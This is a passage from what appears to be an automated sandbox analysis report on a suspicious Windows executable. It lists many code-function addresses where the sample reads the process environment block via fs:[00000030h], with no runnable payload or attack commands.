          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018AF0A5 mov eax, dword ptr fs:[00000030h]5_2_018AF0A5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D50B7 mov eax, dword ptr fs:[00000030h]5_2_018D50B7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181B0D0 mov eax, dword ptr fs:[00000030h]5_2_0181B0D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FD02D mov eax, dword ptr fs:[00000030h]5_2_017FD02D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183D0F0 mov eax, dword ptr fs:[00000030h]5_2_0183D0F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183D0F0 mov ecx, dword ptr fs:[00000030h]5_2_0183D0F0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01825004 mov eax, dword ptr fs:[00000030h]5_2_01825004
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01825004 mov ecx, dword ptr fs:[00000030h]5_2_01825004
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F90F8 mov eax, dword ptr fs:[00000030h]5_2_017F90F8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F90F8 mov eax, dword ptr fs:[00000030h]5_2_017F90F8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F90F8 mov eax, dword ptr fs:[00000030h]5_2_017F90F8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F90F8 mov eax, dword ptr fs:[00000030h]5_2_017F90F8
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FC0F6 mov eax, dword ptr fs:[00000030h]5_2_017FC0F6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01808009 mov eax, dword ptr fs:[00000030h]5_2_01808009
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01842010 mov ecx, dword ptr fs:[00000030h]5_2_01842010
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB0D6 mov eax, dword ptr fs:[00000030h]5_2_017FB0D6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB0D6 mov eax, dword ptr fs:[00000030h]5_2_017FB0D6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB0D6 mov eax, dword ptr fs:[00000030h]5_2_017FB0D6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB0D6 mov eax, dword ptr fs:[00000030h]5_2_017FB0D6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01830044 mov eax, dword ptr fs:[00000030h]5_2_01830044
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801051 mov eax, dword ptr fs:[00000030h]5_2_01801051
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801051 mov eax, dword ptr fs:[00000030h]5_2_01801051
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D505B mov eax, dword ptr fs:[00000030h]5_2_018D505B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018A9060 mov eax, dword ptr fs:[00000030h]5_2_018A9060
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FA093 mov ecx, dword ptr fs:[00000030h]5_2_017FA093
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FC090 mov eax, dword ptr fs:[00000030h]5_2_017FC090
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01807072 mov eax, dword ptr fs:[00000030h]5_2_01807072
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01806074 mov eax, dword ptr fs:[00000030h]5_2_01806074
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01806074 mov eax, dword ptr fs:[00000030h]5_2_01806074
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01801380 mov eax, dword ptr fs:[00000030h]5_2_01801380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181F380 mov eax, dword ptr fs:[00000030h]5_2_0181F380
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF38A mov eax, dword ptr fs:[00000030h]5_2_018BF38A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182A390 mov eax, dword ptr fs:[00000030h]5_2_0182A390
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182A390 mov eax, dword ptr fs:[00000030h]5_2_0182A390
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182A390 mov eax, dword ptr fs:[00000030h]5_2_0182A390
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018093A6 mov eax, dword ptr fs:[00000030h]5_2_018093A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018093A6 mov eax, dword ptr fs:[00000030h]5_2_018093A6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187C3B0 mov eax, dword ptr fs:[00000030h]5_2_0187C3B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F8347 mov eax, dword ptr fs:[00000030h]5_2_017F8347
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F8347 mov eax, dword ptr fs:[00000030h]5_2_017F8347
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F8347 mov eax, dword ptr fs:[00000030h]5_2_017F8347
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018063CB mov eax, dword ptr fs:[00000030h]5_2_018063CB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018333D0 mov eax, dword ptr fs:[00000030h]5_2_018333D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018343D0 mov ecx, dword ptr fs:[00000030h]5_2_018343D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE328 mov eax, dword ptr fs:[00000030h]5_2_017FE328
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE328 mov eax, dword ptr fs:[00000030h]5_2_017FE328
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE328 mov eax, dword ptr fs:[00000030h]5_2_017FE328
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018843D5 mov eax, dword ptr fs:[00000030h]5_2_018843D5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F9303 mov eax, dword ptr fs:[00000030h]5_2_017F9303
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F9303 mov eax, dword ptr fs:[00000030h]5_2_017F9303
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF30A mov eax, dword ptr fs:[00000030h]5_2_018BF30A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188330C mov eax, dword ptr fs:[00000030h]5_2_0188330C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188330C mov eax, dword ptr fs:[00000030h]5_2_0188330C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188330C mov eax, dword ptr fs:[00000030h]5_2_0188330C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188330C mov eax, dword ptr fs:[00000030h]5_2_0188330C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181E310 mov eax, dword ptr fs:[00000030h]5_2_0181E310
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181E310 mov eax, dword ptr fs:[00000030h]5_2_0181E310
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0181E310 mov eax, dword ptr fs:[00000030h]5_2_0181E310
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183631F mov eax, dword ptr fs:[00000030h]5_2_0183631F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01838322 mov eax, dword ptr fs:[00000030h]5_2_01838322
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01838322 mov eax, dword ptr fs:[00000030h]5_2_01838322
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01838322 mov eax, dword ptr fs:[00000030h]5_2_01838322
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182332D mov eax, dword ptr fs:[00000030h]5_2_0182332D
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FC3C7 mov eax, dword ptr fs:[00000030h]5_2_017FC3C7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D3336 mov eax, dword ptr fs:[00000030h]5_2_018D3336
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE3C0 mov eax, dword ptr fs:[00000030h]5_2_017FE3C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE3C0 mov eax, dword ptr fs:[00000030h]5_2_017FE3C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FE3C0 mov eax, dword ptr fs:[00000030h]5_2_017FE3C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A350 mov eax, dword ptr fs:[00000030h]5_2_0183A350
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B360 mov eax, dword ptr fs:[00000030h]5_2_0180B360
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183E363 mov eax, dword ptr fs:[00000030h]5_2_0183E363
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E372 mov eax, dword ptr fs:[00000030h]5_2_0187E372
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E372 mov eax, dword ptr fs:[00000030h]5_2_0187E372
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E372 mov eax, dword ptr fs:[00000030h]5_2_0187E372
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E372 mov eax, dword ptr fs:[00000030h]5_2_0187E372
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182237A mov eax, dword ptr fs:[00000030h]5_2_0182237A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880371 mov eax, dword ptr fs:[00000030h]5_2_01880371
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880371 mov eax, dword ptr fs:[00000030h]5_2_01880371
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB273 mov eax, dword ptr fs:[00000030h]5_2_017FB273
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB273 mov eax, dword ptr fs:[00000030h]5_2_017FB273
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB273 mov eax, dword ptr fs:[00000030h]5_2_017FB273
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E289 mov eax, dword ptr fs:[00000030h]5_2_0187E289
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01807290 mov eax, dword ptr fs:[00000030h]5_2_01807290
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01807290 mov eax, dword ptr fs:[00000030h]5_2_01807290
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01807290 mov eax, dword ptr fs:[00000030h]5_2_01807290
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF2AE mov eax, dword ptr fs:[00000030h]5_2_018BF2AE
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C92AB mov eax, dword ptr fs:[00000030h]5_2_018C92AB
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018242AF mov eax, dword ptr fs:[00000030h]5_2_018242AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018242AF mov eax, dword ptr fs:[00000030h]5_2_018242AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB2BC mov eax, dword ptr fs:[00000030h]5_2_018DB2BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB2BC mov eax, dword ptr fs:[00000030h]5_2_018DB2BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB2BC mov eax, dword ptr fs:[00000030h]5_2_018DB2BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018DB2BC mov eax, dword ptr fs:[00000030h]5_2_018DB2BC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018332C0 mov eax, dword ptr fs:[00000030h]5_2_018332C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018332C0 mov eax, dword ptr fs:[00000030h]5_2_018332C0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018D32C9 mov eax, dword ptr fs:[00000030h]5_2_018D32C9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018232C5 mov eax, dword ptr fs:[00000030h]5_2_018232C5
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180A2E0 mov eax, dword ptr fs:[00000030h]5_2_0180A2E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018082E0 mov eax, dword ptr fs:[00000030h]5_2_018082E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018082E0 mov eax, dword ptr fs:[00000030h]5_2_018082E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018082E0 mov eax, dword ptr fs:[00000030h]5_2_018082E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018082E0 mov eax, dword ptr fs:[00000030h]5_2_018082E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F821B mov eax, dword ptr fs:[00000030h]5_2_017F821B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018102F9 mov eax, dword ptr fs:[00000030h]5_2_018102F9
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FA200 mov eax, dword ptr fs:[00000030h]5_2_017FA200
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FD2EC mov eax, dword ptr fs:[00000030h]5_2_017FD2EC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FD2EC mov eax, dword ptr fs:[00000030h]5_2_017FD2EC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188B214 mov eax, dword ptr fs:[00000030h]5_2_0188B214
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188B214 mov eax, dword ptr fs:[00000030h]5_2_0188B214
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F72E0 mov eax, dword ptr fs:[00000030h]5_2_017F72E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A22B mov eax, dword ptr fs:[00000030h]5_2_0183A22B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A22B mov eax, dword ptr fs:[00000030h]5_2_0183A22B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A22B mov eax, dword ptr fs:[00000030h]5_2_0183A22B
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880227 mov eax, dword ptr fs:[00000030h]5_2_01880227
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880227 mov eax, dword ptr fs:[00000030h]5_2_01880227
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01880227 mov eax, dword ptr fs:[00000030h]5_2_01880227
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01820230 mov ecx, dword ptr fs:[00000030h]5_2_01820230
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C mov eax, dword ptr fs:[00000030h]5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C mov eax, dword ptr fs:[00000030h]5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C mov eax, dword ptr fs:[00000030h]5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018C124C mov eax, dword ptr fs:[00000030h]5_2_018C124C
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0182F24A mov eax, dword ptr fs:[00000030h]5_2_0182F24A
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF247 mov eax, dword ptr fs:[00000030h]5_2_018BF247
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FC2B0 mov ecx, dword ptr fs:[00000030h]5_2_017FC2B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F92AF mov eax, dword ptr fs:[00000030h]5_2_017F92AF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187D250 mov eax, dword ptr fs:[00000030h]5_2_0187D250
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187D250 mov ecx, dword ptr fs:[00000030h]5_2_0187D250
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0189327E mov eax, dword ptr fs:[00000030h]5_2_0189327E
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BD270 mov eax, dword ptr fs:[00000030h]5_2_018BD270
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A580 mov eax, dword ptr fs:[00000030h]5_2_0183A580
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A580 mov eax, dword ptr fs:[00000030h]5_2_0183A580
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01839580 mov eax, dword ptr fs:[00000030h]5_2_01839580
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01839580 mov eax, dword ptr fs:[00000030h]5_2_01839580
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018BF582 mov eax, dword ptr fs:[00000030h]5_2_018BF582
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E588 mov eax, dword ptr fs:[00000030h]5_2_0187E588
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0187E588 mov eax, dword ptr fs:[00000030h]5_2_0187E588
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01832594 mov eax, dword ptr fs:[00000030h]5_2_01832594
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188C592 mov eax, dword ptr fs:[00000030h]5_2_0188C592
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018885AA mov eax, dword ptr fs:[00000030h]5_2_018885AA
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018045B0 mov eax, dword ptr fs:[00000030h]5_2_018045B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018045B0 mov eax, dword ptr fs:[00000030h]5_2_018045B0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F753F mov eax, dword ptr fs:[00000030h]5_2_017F753F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F753F mov eax, dword ptr fs:[00000030h]5_2_017F753F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017F753F mov eax, dword ptr fs:[00000030h]5_2_017F753F
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183C5C6 mov eax, dword ptr fs:[00000030h]5_2_0183C5C6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018805C6 mov eax, dword ptr fs:[00000030h]5_2_018805C6
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018365D0 mov eax, dword ptr fs:[00000030h]5_2_018365D0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0180B5E0 mov eax, dword ptr fs:[00000030h]5_2_0180B5E0
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A5E7 mov ebx, dword ptr fs:[00000030h]5_2_0183A5E7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0183A5E7 mov eax, dword ptr fs:[00000030h]5_2_0183A5E7
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_018315EF mov eax, dword ptr fs:[00000030h]5_2_018315EF
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_0188C5FC mov eax, dword ptr fs:[00000030h]5_2_0188C5FC
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_017FB502 mov eax, dword ptr fs:[00000030h]5_2_017FB502
          Source: C:\Users\user\Desktop\yPURXYpFVuXra2o.exeCode function: 5_2_01802500 mov eax, dword ptr fs:[00000030h]5_2_01802500
